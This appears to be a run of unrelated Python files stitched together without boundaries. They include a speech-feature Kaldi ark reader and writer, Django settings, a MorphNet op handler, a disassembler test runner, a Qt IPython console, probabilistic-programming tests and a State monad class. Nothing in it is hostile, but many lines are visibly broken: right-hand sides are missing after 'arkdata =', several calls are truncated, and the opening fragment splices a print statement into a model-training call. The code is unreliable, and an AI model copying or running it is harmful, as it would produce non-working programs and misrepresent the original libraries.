range(subjects): if sub == i: continue else: Train_X.append(SubperdB[i]) Train_Y.append(labelperSub[i]) # print(Train_X) # Train_X=np.hstack(Train_X) # print(Train_X.shape) Train_X=np.vstack(Train_X) # changed to hstack from vstack # print(Train_X.shape) # Train_X = Train_X.shape[1:] # print(Train_X.shape) # Train_X = np.expand_dims(Train_X, axis=2) # Train_X = np.reshape(Train_X, Train_X.shape + (1, 1,) ) # Train_X = np.reshape( Train_X, Train_X.shape ) # Train_X = np.reshape(2500, 16077) print(Train_X.shape) Train_Y=np.hstack(Train_Y) Train_Y=np_utils.to_categorical(Train_Y,5) print (np.shape(Train_Y)) print (np.shape(Train_X)) print (np.shape(Test_Y)) print (np.shape(Test_X)), Train_Y, validation_split=0.05, epochs=1, batch_size=20) model.summary() predict=model.predict_classes(Test_X) ## predict[predict>= 0.5] = 1 ## predict[predict<0.5] = 0 print (predict) print (Test_Y) #compute the ConfusionMat ct=confusion_matrix(Test_Y,predict) #check the order of the CT order=np.unique(np.concatenate((predict,Test_Y))) #create an array to hold the CT for each CV mat=np.zeros((n_exp,n_exp)) #put the order accordingly, in order to form the overall ConfusionMat for m in range(len(order)): for n in range(len(order)): mat[int(order[m]),int(order[n])]=ct[m,n] tot_mat=mat+tot_mat # write each CT of each CV into .txt file if not os.path.exists(workplace+'Classification/'+'Result/'+dB+'/'): os.mkdir(workplace+'Classification/'+ 'Result/'+dB+'/') with open(workplace+'Classification/'+ 'Result/'+dB+'/sub_CT.txt','a') as csvfile: thewriter=csv.writer(csvfile, delimiter=' ') thewriter.writerow('Sub ' + str(sub+1)) thewriter=csv.writer(csvfile,dialect=csv.excel_tab) for row in ct: thewriter.writerow(row) thewriter.writerow(order) thewriter.writerow('\n') if sub==subjects-1: # compute the accuracy, F1, P and R from the overall CT microAcc=np.trace(tot_mat)/np.sum(tot_mat) [f1,p,r]=fpr(tot_mat,n_exp) # save into a .txt file with open(workplace+'Classification/'+ 'Result/'+dB+'/final_CT.txt','w') as csvfile: thewriter=csv.writer(csvfile,dialect=csv.excel_tab) for row in tot_mat: thewriter.writerow(row) thewriter=csv.writer(csvfile, delimiter=' ') thewriter.writerow('micro:' + str(microAcc)) thewriter.writerow('F1:' + str(f1)) thewriter.writerow('Precision:' + str(p)) thewriter.writerow('Recall:' + str(r))
<reponame>musiclvme/distant_speech_recognition<filename>btk20_src/lib/ #!/usr/bin/env python # -*- coding: utf-8 -*- # # MIT License # # Copyright (c) 2018 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. """ Basic classes to read/write a binary Kaldi ark file """ import struct, numpy BFM_SYM = b'BFM ' BIV_SYM = b'B' FEAT_BYTE_SIZE = b'\x04' NULLC = b'\0' WAV_SYM = b'RIFF' class KaldiArkReader: """ Base class for readling a Kaldi ark file """ def __init__(self, store_image=False): """ Constructor of KaldiArkReader :params store_image: Every utterance data in the ark file will be kept in RAM if True """ self.arkfp = None self.curr_arkfile = None if store_image == True:# store all the utterance data into image self.arkdata = {} # arkdata[ID] = {matrix|vector} self.uttids = [] # remember the order of utterance IDs in an ark file else: self.arkdata = None self.uttids = None def __enter__(self): return self def __iter__(self): """ Read each utterance from the ark file and return it :returns : Python dictionary that contains the utterance ID as a key and data as a value """ raise NotImplemented('Implement this') def __exit__(self, exc_type, exc_val, exc_tb): self.close() def accumulate(self, uttid, dataelem): """ Store all the utterance data into the RAM if this is constructed with store_image = True. """ if self.arkdata is None: self.arkdata = {} self.uttids = [] self.arkdata[uttid] = dataelem self.uttids.append(uttid) def open(self, arkfile): """ Set the ark file to be read later """ if self.arkfp is not None: raise IOError('call close() first') self.arkfp = open(arkfile, 'rb') self.curr_arkfile = arkfile def close(self): """ Close the file pointer if it is opened """ if self.arkfp is not None: self.arkfp.close() self.arkfp = None self.curr_arkfile = None if self.arkdata is not None: self.arkdata = {} self.uttids = [] def seek(self, position_in_bytes): """ Skip the file pointer. You can pick up the file position from .scp file """ if self.arkfp is not None:, 0) class KaldiFeatArkReader(KaldiArkReader): """ Read a Kaldi .feat.ark file per utterance iteratively """ def __init__(self, store_image=False): KaldiArkReader.__init__(self, store_image) def __iter__(self): """ Return a tuple of an utterance ID and feature matrix where each row vector correpsonds to a feature vector per frame :returns: (string, numpy.matrix) """ uttid = b'' while True: arkdata = if arkdata == b'': raise StopIteration('End of feat ark file') c = struct.unpack('<s', arkdata)[0] if c == b' ': arkdata = # skip '\0' arkdata = # read the end symbol 'BFM ' endSym = struct.unpack('<4s', arkdata)[0] if endSym != BFM_SYM: raise ValueError('ERROR: %s could not find BFM but %s' %(self.curr_arkfile, endSym)) arkdata = # skip one byte data '\x04' arkdata = # read no. frames frameN = struct.unpack( '<I', arkdata )[0] arkdata = # skip one byte data '\x04' arkdata = # read the dimension featD = struct.unpack( '<I', arkdata )[0] coeffN = frameN * featD # read the coefficients arkdata = * 4) feMat = numpy.reshape(struct.unpack('<%df' %(coeffN), arkdata), (frameN,featD)) uttid = uttid.decode() if self.arkdata is not None: self.accumulate(uttid, feMat) uttid2data = {uttid:feMat} uttid = b'' yield uttid2data else: uttid += c class KaldiIntVectorArkReader(KaldiArkReader): """ Read a Kaldi integer-vector file per utterance iteratively """ def __init__(self, store_image=False): KaldiArkReader.__init__(self, store_image) def __iter__(self): """ Return a tuple of an utterance ID and vector :returns: (string, numpy.vector) """ uttid = b'' while True: arkdata = if arkdata == b'': break c = struct.unpack('<s', arkdata)[0] if c == b' ': arkdata = # skip '\0' arkdata = # read the end symbol 'B' endSym = struct.unpack('<s', arkdata)[0] if endSym != BIV_SYM: raise ValueError('ERROR: %s: Unmatched symbol %s!=%s' %(self.curr_arkfile, endSym, BIV_SYM)) arkdata = # skip one byte data '\x04' arkdata = # read no. frames frameN = struct.unpack('<i', arkdata)[0] # read the coefficients vals = [] for i in range(frameN): arkdata = arkdata = vals.append(struct.unpack('<i', arkdata)[0]) intVec = numpy.array(vals) uttid = uttid.decode() if self.arkdata is not None: self.accumulate(uttid, intVec) uttid2data = {uttid:intVec} uttid = b'' yield uttid2data else: uttid += c class KaldiWavArkReader(KaldiArkReader): """ Read a Kaldi .wav.ark file per utterance iteratively """ def __init__(self, store_image=False): KaldiArkReader.__init__(self, store_image) self.riff_header = None self.samplerate = None self.num_channels = None def get_riff_header(self): return self.riff_header def get_samplerate(self): return self.samplerate def get_num_channel(self): return self.num_channels def __iter__(self): """ Return a tuple of an utterance ID and audio samples as a 16-bit integer vector :returns: (string, numpy.int16 vector) """ uttid = b'' while True: arkdata = if arkdata == b'': raise StopIteration('End of wav ark file') c = struct.unpack('<s', arkdata)[0] if c == b' ': # read the 44 Byte header block of the RIFF file riff_header = # skip '\0' endSym = struct.unpack('<4s',riff_header[0:4])[0] dataLength = struct.unpack('<L', riff_header[40:44])[0] bitsPerSample = struct.unpack('<h', riff_header[34:36])[0] # nsamps = int(dataLength / (bitsPerSample/8)) # divide 2 (Byte) self.samplerate = struct.unpack('<L', riff_header[24:28])[0] self.num_channels = struct.unpack('<h', riff_header[22:24])[0] if endSym != WAV_SYM: raise ValueError('ERROR: %s: could not find %s but %s' %(self.curr_arkfile, WAV_SYM, endSym)) if bitsPerSample != 16: raise ValueError('ERROR: %s: expecting utterance with int16 format but %d bits per sample.' % (self.curr_arkfile, bitsPerSample)) uttBinary = # expecting 16 bit per sample uttInt = [struct.unpack('<h', uttBinary[i:i+2]) for i in numpy.arange(0,len(uttBinary), 2)] samples = numpy.array(numpy.int16(numpy.resize(uttInt, (len(uttInt),)))) self.riff_header = riff_header uttid = uttid.decode() if self.arkdata is not None: self.accumulate(uttid, samples) uttid2data = {uttid:samples} uttid = b'' yield uttid2data else: uttid += c class KaldiArkWriter: """ Base class for writing a Kaldi ark file """ def __init__(self): self.arkfp = None def __entry__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.close() def open(self, arkfile): if self.arkfp is not None: raise IOError('call close() first') self.arkfp = open(arkfile, 'wb') def close(self): if self.arkfp is not None: self.arkfp.close() self.arkfp = None class KaldiFeatArkWriter(KaldiArkWriter): """ Write utterance data as a Kaldi .feat.ark file """ def __init__(self): KaldiArkWriter.__init__(self) def write(self, uttid2feats, uttids=None): if uttids is None: uttids = list(uttid2feats.keys()) for uttid in uttids: feMat = uttid2feats[uttid] frameN = len(feMat) featD = len(feMat[0]) outData = b'' for c in uttid + ' ': outData += struct.pack('<c', c.encode()) outData += struct.pack('<c', NULLC) for c in BFM_SYM.decode(): outData +=struct.pack('<c', c.encode()) outData += struct.pack('<c', FEAT_BYTE_SIZE) outData += struct.pack('<I', frameN) outData += struct.pack('<c', FEAT_BYTE_SIZE) outData += struct.pack('<I', featD) self.arkfp.write(outData) outData = b'' for frameX in range(frameN): for coeff in feMat[frameX]: outData += struct.pack('<f', coeff) self.arkfp.write(outData) self.arkfp.flush() class KaldiIntVectorArkWriter(KaldiArkWriter): """ Write utterance data as a Kaldi int-vector ark file """ def __init__(self): KaldiArkWriter.__init__(self) def write(self, uttid2feats, uttids=None): if uttids is None: uttids = list(uttid2feats.keys()) for uttid in uttids: intVec = uttid2feats[uttid] # write data header frameN = len(intVec) outData = b'' for c in uttid + ' ': outData += struct.pack('<c', c.encode()) outData += struct.pack('<c', NULLC) for c in BIV_SYM.decode(): outData +=struct.pack('<c', c.encode()) outData += struct.pack('<c', FEAT_BYTE_SIZE) outData += struct.pack('<I', frameN) self.arkfp.write(outData) # write actual vector data outData = b'' for coeff in intVec: outData += struct.pack('<c', FEAT_BYTE_SIZE) outData += struct.pack('<i', coeff) self.arkfp.write(outData) self.arkfp.flush() def correct_chunk_size(numSamples, riff_header): """ Correct the data length in header information; see for details """ bytesPerSample = struct.unpack( '<h', riff_header[34:36] )[0] // 8 dataLength = numSamples * bytesPerSample totalChunkSize = 36 + dataLength return (riff_header[0:4] + struct.pack('<L', totalChunkSize) + riff_header[8:40] + struct.pack('<L', dataLength) + riff_header[44:]) class KaldiWavArkWriter(KaldiArkWriter): """ Write utterance data as a Kaldi .wav.ark file """ def __init__(self): KaldiArkWriter.__init__(self) def write(self, uttid2feats, uttid2headers, uttids=None): if uttids is None: uttids = list(uttid2feats.keys()) for uttid in uttids: outData = b'' for c in uttid + ' ': outData += struct.pack('<c', c.encode()) self.arkfp.write(outData) samples = uttid2feats[uttid] # write the corrected header information uttid2header = correct_chunk_size(len(samples), uttid2headers[uttid]) self.arkfp.write(uttid2header) outData = b'' for samp in samples: outData += struct.pack('<h', samp) self.arkfp.write(outData) self.arkfp.flush() def dump_riff_file(self, riff_file, uttid): """ Dump the data in a RIFF file into the wav ark file """ outData = b'' for c in uttid + ' ': outData += struct.pack('<c', c.encode()) self.arkfp.write(outData) with open(riff_file, 'rb') as riffF: self.arkfp.write( self.arkfp.flush() def test(): import argparse def build_parser(): parser = argparse.ArgumentParser(description='List utterance IDs in the ark file') parser.add_argument('-t', '--type', default='f', help='Ark file type (i/f/w)') parser.add_argument('input_ark', help='input ark path') parser.add_argument('output_ark', help='output ark path') return parser parser = build_parser() args, argv = parser.parse_known_args() if args.type == 'f': reader = KaldiFeatArkReader() writer = KaldiFeatArkWriter() elif args.type == 'w': reader = KaldiWavArkReader() writer = KaldiWavArkWriter() else: reader = KaldiIntVectorArkReader() writer = KaldiIntVectorArkWriter() for uttid2data in reader: print(('uttid: %s' %list(uttid2data.keys())[0])) if args.type == 'w': writer.write(uttid2data, {list(uttid2data.keys())[0]:reader.get_riff_header()}) else: writer.write(uttid2data) reader.close() writer.close() if __name__ == '__main__': test()
# Django Library from django.urls import path # Localfolder Library from .views.paypal_config import UpdatePaypalConfigView # app_name = 'paypal' urlpatterns = [ path('paypal-config/<int:pk>', UpdatePaypalConfigView.as_view(), name='paypal-config'), ]
from .base import * DEBUG = False TEMPLATE_DEBUG = DEBUG # Use the cached template loader so template is compiled once and read from # memory instead of reading from disk on each load. TEMPLATE_LOADERS = ( ('django.template.loaders.cached.Loader', ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', )), ) # Hosts/domain names that are valid for this site; required if DEBUG is False # See ALLOWED_HOSTS = [''] # Make this unique, and don't share it with anybody. SECRET_KEY = os.environ['DJANGO_SECRET_KEY'] DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': 'glucosetracker', 'USER': os.environ['DATABASE_USER'], 'PASSWORD': os.environ['DATABASE_PASSWORD'], 'HOST': 'localhost', 'PORT': '', } } # 3rd-party apps tracking IDs. INTERCOM_APP_ID = 'a6d0326564469dfd7f7d9b1bfc909ee3815a85a8' GOOGLE_ANALYTICS_TRACKING_ID = 'UA-45698014-1' ADDTHIS_PUBLISHER_ID = 'ra-52fffdf9456ec7d2' # The 'From:' header of admin-related emails. DEFAULT_FROM_EMAIL = '<EMAIL>' ADMINS = ( ('Local Admin', '<EMAIL>'), ) MANAGERS = ADMINS CONTACTS = { 'support_email': ' <<EMAIL>>', 'admin_email': '<EMAIL>', 'info_email': ' <<EMAIL>>', } # Subscribers app settings SEND_SUBSCRIBERS_EMAIL_CONFIRMATION = True # Django-storages settings DEFAULT_FILE_STORAGE = 'core.s3utils.MediaRootS3BotoStorage' AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID'] AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY'] AWS_STORAGE_BUCKET_NAME = 'glucosetracker-assets' AWS_QUERYSTRING_AUTH = False MEDIA_URL = '//' % (AWS_STORAGE_BUCKET_NAME, MEDIA_ROOT)
<gh_stars>1000+ """OpHandler for OutputNonPassthrough ops. OutputNonPassthrough ops take their regularizer from the output and do not passthrough the regularizer to their input. This is the default OpHandler for ops like Conv2D and MatMul when L1-gamma regularization is used. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from morph_net.framework import op_handler from morph_net.framework import op_handler_util class OutputNonPassthroughOpHandler(op_handler.OpHandler): """OpHandler implementation for OutputNonPassthrough operations. These ops take their regularizer from the output and do not passthrough the regularizer to their input. """ @property def is_source_op(self): return False @property def is_passthrough(self): return False def assign_grouping(self, op, op_reg_manager): """Assign grouping to the given op and updates the manager. Args: op: tf.Operation to assign grouping to. op_reg_manager: OpRegularizerManager to keep track of the grouping. """ # Check if all input ops have groups, or tell the manager to process them. input_ops = op_handler_util.get_input_ops(op, op_reg_manager) input_ops_without_group = op_handler_util.get_ops_without_groups( input_ops, op_reg_manager) # Check if all output ops have groups, or tell the manager to process them. output_ops = op_handler_util.get_output_ops(op, op_reg_manager) output_ops_without_group = op_handler_util.get_ops_without_groups( output_ops, op_reg_manager) # Remove non-passthrough ops from outputs ops to group with. output_ops = op_handler_util.remove_non_passthrough_ops( output_ops, op_reg_manager) # Only group with ops that have the same size. Process the ops that have # mismatched size. output_ops_to_group, output_ops_to_process = ( op_handler_util.separate_same_size_ops(op, output_ops)) # Also process ungrouped ops. input_ops_to_process = input_ops_without_group output_ops_to_process.extend(output_ops_without_group) # Align op slice sizes if needed. op_slices = op_reg_manager.get_op_slices(op) output_op_slices = op_handler_util.get_op_slices( output_ops_to_group, op_reg_manager) aligned_op_slice_sizes = op_handler_util.get_aligned_op_slice_sizes( op_slices, [], output_op_slices) op_handler_util.reslice_ops([op] + output_ops_to_group, aligned_op_slice_sizes, op_reg_manager) # TODO(a1): Consider refactoring this method. # Repopulate OpSlice data, as ops may have been resliced. output_op_slices = self._get_output_op_slices( output_ops_to_group, op_reg_manager) # Group with inputs and outputs. op_handler_util.group_op_with_inputs_and_outputs( op, [], output_op_slices, aligned_op_slice_sizes, op_reg_manager) # Reprocess ops. op_reg_manager.process_ops(output_ops_to_process + input_ops_to_process) def _group_with_output_slices( self, op, output_op_slices, op_slices, op_reg_manager): """Groups OpSlice of current op with output ops. Assuming OpSlice of op have been aligned with output, groups the corresponding OpSlice. Args: op: tf.Operation to determine grouping for. output_op_slices: List of list of OpSlice, with a list per output op. op_slices: List of OpSlice for current op. op_reg_manager: OpRegularizerManager to keep track of grouping. Raises: ValueError: If sizes for current and output op slices are not the same. """ # Assert that op slices for output and current op are aligned. output_op_slices_sizes = op_handler_util.get_op_slice_sizes( output_op_slices) op_slice_sizes = op_handler_util.get_op_slice_sizes([op_slices]) if op_slice_sizes != output_op_slices_sizes: raise ValueError('Current op and output op have differing slice ' 'sizes: {}, {}'.format( op_slice_sizes, output_op_slices_sizes)) op_handler_util.group_op_with_inputs_and_outputs( op, [], output_op_slices, op_slice_sizes, op_reg_manager) def _get_output_op_slices(self, output_ops, op_reg_manager): """Returns op slices for outputs. Args: output_ops: List of tf.Operation. op_reg_manager: OpRegularizerManager to keep track of the grouping. Returns: A list of list of OpSlice with a list per output op. """ return op_handler_util.get_op_slices(output_ops, op_reg_manager) def create_regularizer(self, _): raise NotImplementedError('Not a source op.')
<reponame>zipated/src #!/usr/bin/python # Copyright (c) 2013 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import os import subprocess import sys import tempfile import objdump_parser import test_format class RdfaTestRunner(test_format.TestRunner): SECTION_NAME = 'dis' def CommandLineOptions(self, parser): parser.add_option('--objdump', help='Path to objdump') def GetSectionContent(self, options, sections): arch = {32: '-Mi386', 64: '-Mx86-64'}[options.bits] data = ''.join(test_format.ParseHex(sections['hex'])) # TODO(shcherbina): get rid of custom prefix once # # is actually fixed. tmp = tempfile.NamedTemporaryFile( prefix='tmprdfa_', mode='wb', delete=False) try: tmp.write(data) tmp.close() objdump_proc = subprocess.Popen( [options.objdump, '-mi386', arch, '--target=binary', '--disassemble-all', '--disassemble-zeroes', '--insn-width=15',], stdout=subprocess.PIPE, # On Windows, builds of binutils based on Cygwin end lines with # \n while builds of binutils based on MinGW end lines with \r\n. # The 'universal_newlines' feature makes this work with either one. universal_newlines=True) result = ''.join(objdump_parser.SkipHeader(objdump_proc.stdout)) return_code = objdump_proc.wait() assert return_code == 0, 'error running objdump' finally: tmp.close() os.remove( return result def main(argv): RdfaTestRunner().Run(argv) if __name__ == '__main__': main(sys.argv[1:])
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright © 2018 <NAME> """ Support creation of an iPython console, with rayoptics environment .. Created on Wed Nov 21 21:48:02 2018 .. codeauthor: <NAME> """ from PyQt5.QtGui import QColor from qtconsole.rich_jupyter_widget import RichJupyterWidget from qtconsole.inprocess import QtInProcessKernelManager from qtconsole import styles from IPython.lib import guisupport import qdarkstyle from rayoptics.gui.appmanager import ModelInfo from rayoptics.util import colors default_template = '''\ QPlainTextEdit, QTextEdit { background-color: %(bgcolor)s; background-clip: padding; color: %(fgcolor)s; selection-background-color: %(select)s; } .inverted { background-color: %(fgcolor)s; color: %(bgcolor)s; } .error { color: red; } .in-prompt { color: %(i_color)s; } .in-prompt-number { font-weight: bold; } .out-prompt { color: %(o_color)s; } .out-prompt-number { font-weight: bold; } ''' def create_ipython_console(gui_parent, opt_model, title, view_width, view_ht): """ create a iPython console with a rayoptics environment """ def create_light_or_dark_callback(ipy_console): # if not hasattr(ipy_console, 'background'): # ipy_console.background = ipy_console.background() def l_or_d(is_dark): accent = colors.accent_colors(is_dark) prompt_style = { 'i_color': accent['cyan'], 'o_color': accent['orange'], } if is_dark: ipy_console.setStyleSheet( qdarkstyle.load_stylesheet(qt_api='pyqt5')) # color_defs = {**styles.get_colors('solarized-dark'), # **prompt_style } else: ipy_console.setStyleSheet('') # color_defs = {**styles.get_colors('solarized-light'), # **prompt_style } # ipy_console.style_sheet = default_template%color_defs # ipy_console._style_sheet_changed() return l_or_d if opt_model: ro_env = { 'gui_parent': gui_parent, 'app': gui_parent.app_manager, 'opm': opt_model, 'sm': opt_model.seq_model, 'osp': opt_model.optical_spec, 'pm': opt_model.parax_model, 'em': opt_model.ele_model, 'pt': opt_model.part_tree, } else: ro_env = { 'gui_parent': gui_parent, 'app': gui_parent.app_manager, } ro_setup = 'from rayoptics.environment import *' # construct the top level widget ipy_console = ConsoleWidget() # load the environment ipy_console.execute_command(ro_setup) ipy_console.push_vars(ro_env) mi = ModelInfo(opt_model) sub_window = gui_parent.add_subwindow(ipy_console, mi) sub_window.setWindowTitle(title) sub_window.sync_light_or_dark = create_light_or_dark_callback(ipy_console) orig_x, orig_y = gui_parent.initial_window_offset() sub_window.setGeometry(orig_x, orig_y, view_width, view_ht) class ConsoleWidget(RichJupyterWidget): def __init__(self, customBanner=None, *args, **kwargs): super().__init__(*args, **kwargs) if customBanner is not None: self.banner = customBanner self.font_size = 6 self.kernel_manager = kernel_manager = QtInProcessKernelManager() kernel_manager.start_kernel(show_banner=False) kernel_manager.kernel.gui = 'qt' self.kernel_client = kernel_client = self.kernel_manager.client() kernel_client.start_channels() def stop(): kernel_client.stop_channels() kernel_manager.shutdown_kernel() guisupport.get_app_qt().exit() self.exit_requested.connect(stop) def push_vars(self, variableDict): """ Given a dictionary containing name / value pairs, push those variables to the Jupyter console widget """ def clear(self): """ Clears the terminal """ self._control.clear() # self.kernel_manager def print_text(self, text): """ Prints some plain text to the console """ self._append_plain_text(text) def execute_command(self, command): """ Execute a command in the frame of the console widget """ self._execute(command, False)
from __future__ import absolute_import from __future__ import division from __future__ import print_function import edward as ed import numpy as np import tensorflow as tf from collections import namedtuple from edward.models import ( Beta, Dirichlet, DirichletProcess, Gamma, MultivariateNormalDiag, Normal, Poisson, TransformedDistribution) from tensorflow.contrib.distributions import bijectors class test_transform_class(tf.test.TestCase): def assertSamplePosNeg(self, sample): num_pos = np.sum((sample > 0.0), axis=0, keepdims=True) num_neg = np.sum((sample < 0.0), axis=0, keepdims=True) self.assertTrue((num_pos > 0).all()) self.assertTrue((num_neg > 0).all()) def test_args(self): with self.test_session(): x = Normal(-100.0, 1.0) y = ed.transform(x, bijectors.Softplus()) sample = y.sample(10).eval() self.assertTrue((sample >= 0.0).all()) def test_kwargs(self): with self.test_session(): x = Normal(-100.0, 1.0) y = ed.transform(x, bijector=bijectors.Softplus()) sample = y.sample(10).eval() self.assertTrue((sample >= 0.0).all()) def test_01(self): with self.test_session(): x = Beta(1.0, 1.0) y = ed.transform(x) self.assertIsInstance(y, TransformedDistribution) sample = y.sample(10, seed=1).eval() self.assertSamplePosNeg(sample) def test_nonnegative(self): with self.test_session(): x = Gamma(1.0, 1.0) y = ed.transform(x) self.assertIsInstance(y, TransformedDistribution) sample = y.sample(10, seed=1).eval() self.assertSamplePosNeg(sample) def test_simplex(self): with self.test_session(): x = Dirichlet([1.1, 1.2, 1.3, 1.4]) y = ed.transform(x) self.assertIsInstance(y, TransformedDistribution) sample = y.sample(10, seed=1).eval() self.assertSamplePosNeg(sample) def test_real(self): with self.test_session(): x = Normal(0.0, 1.0) y = ed.transform(x) self.assertIsInstance(y, Normal) sample = y.sample(10, seed=1).eval() self.assertSamplePosNeg(sample) def test_multivariate_real(self): with self.test_session(): x = MultivariateNormalDiag(tf.zeros(2), tf.ones(2)) y = ed.transform(x) sample = y.sample(10, seed=1).eval() self.assertSamplePosNeg(sample) def test_no_support(self): with self.test_session(): x = DirichletProcess(1.0, Normal(0.0, 1.0)) with self.assertRaises(AttributeError): y = ed.transform(x) def test_unhandled_support(self): with self.test_session(): FakeRV = namedtuple('FakeRV', ['support']) x = FakeRV(support='rational') with self.assertRaises(ValueError): y = ed.transform(x) if __name__ == '__main__': tf.test.main()
<filename>oslash/ from typing import Callable, Tuple, Any, TypeVar, Generic from .util import Unit from .typing import Functor from .typing import Monad TState = TypeVar("TState") TSource = TypeVar("TSource") TResult = TypeVar("TResult") class State(Generic[TSource, TState]): """The state monad. Wraps stateful computations. A stateful computation is a function that takes a state and returns a result and new state: state -> (result, state') """ def __init__(self, fn: Callable[[TState], Tuple[TSource, TState]]) -> None: """Initialize a new state. Keyword arguments: fn -- State processor. """ self._fn = fn @classmethod def unit(cls, value: TSource) -> "State[TSource, TState]": r"""Create new State. The unit function creates a new State object wrapping a stateful computation. State $ \s -> (x, s) """ return cls(lambda state: (value, state)) def map(self, mapper: Callable[[TSource], TResult]) -> "State[TResult, TState]": def _(a: Any, state: Any) -> Tuple[Any, Any]: return mapper(a), state return State(lambda state: _(* def bind(self, fn: Callable[[TSource], "State[TState, TResult]"]) -> "State[TResult, TState]": r"""m >>= k = State $ \s -> let (a, s') = runState m s in runState (k a) s' """ def _(result: Any, state: Any) -> Tuple[Any, Any]: return fn(result).run(state) return State(lambda state: _(* @classmethod def get(cls) -> "State[TState, TState]": r"""get = state $ \s -> (s, s)""" return State(lambda state: (state, state)) @classmethod def put(cls, new_state: TState) -> "State[Tuple, TState]": r"""put newState = state $ \s -> ((), newState)""" return State(lambda state: (Unit, new_state)) def run(self, state: TState) -> Tuple[TSource, TState]: """Return wrapped state computation. This is the inverse of unit and returns the wrapped function. """ return self._fn(state) def __call__(self, state: Any) -> Tuple: return assert issubclass(State, Functor) assert issubclass(State, Monad)
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. """ """ class ErrorNLU: """Base model for generating NLU error.""" def __init__(self, act_type_rate=0.0, slot_rate=0.0): """ Args: act_type_rate (float): The error rate applied on dialog act type. slot_rate (float): Error rate applied on slots. """ self.set_error_rate(act_type_rate, slot_rate) def set_error_rate(self, act_type_rate, slot_rate): """ Set error rate parameter for error model. Args: act_type_rate (float): The error rate applied on dialog act type. slot_rate (float): Error rate applied on slots. """ self.act_type_rate = act_type_rate self.slot_rate = slot_rate def apply(self, dialog_act): """ Apply the error model on dialog act. Args: dialog_act (tuple): Dialog act. Returns: dialog_act (tuple): Dialog act with noise. """ #TODO return
#!/usr/bin/env python3 # # Copyright (c) 2019, The OpenThread Authors. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # nullField = None class NullField(object): """ Represents a null field that does not exists. """ def __new__(cls, *args, **kwargs): global nullField if nullField is None: nullField = object.__new__(cls, *args, **kwargs) return nullField def __init__(self): assert self is nullField def __bool__(self): """ NullField is always treated as False. """ return False def __getattr__(self, item): """ Any sub field of the NullField is NullField itself. """ return self def __setattr__(self, key, value): pass def __len__(self) -> 0: return 0 def __eq__(self, other): """ NullField is always not equal to any other value. """ return False def __ne__(self, other): return True def __lt__(self, other): """ Comparing NullField to any other value gets False. """ return False def __le__(self, other): """ Comparing NullField to any other value gets False. """ return False def __gt__(self, other): """ Comparing NullField to any other value gets False. """ return False def __ge__(self, other): """ Comparing NullField to any other value gets False. """ return False def __str__(self): return "nullField" def __repr__(self): return 'nullField' NullField() if __name__ == '__main__': assert nullField is NullField() assert not nullField, repr(nullField) assert nullField != nullField, repr(nullField) assert nullField != 0 assert not (nullField > 1) assert not (nullField < 1) assert not (nullField < nullField) assert not (nullField > nullField) assert bool(nullField) is False assert nullField != "" assert nullField != None # noqa assert nullField is not None
# Copyright (c) OpenMMLab. All rights reserved. from mmcv.utils import build_from_cfg from mmdet.core.bbox.iou_calculators.builder import IOU_CALCULATORS ROTATED_IOU_CALCULATORS = IOU_CALCULATORS def build_iou_calculator(cfg, default_args=None): """Builder of IoU calculator.""" return build_from_cfg(cfg, ROTATED_IOU_CALCULATORS, default_args)
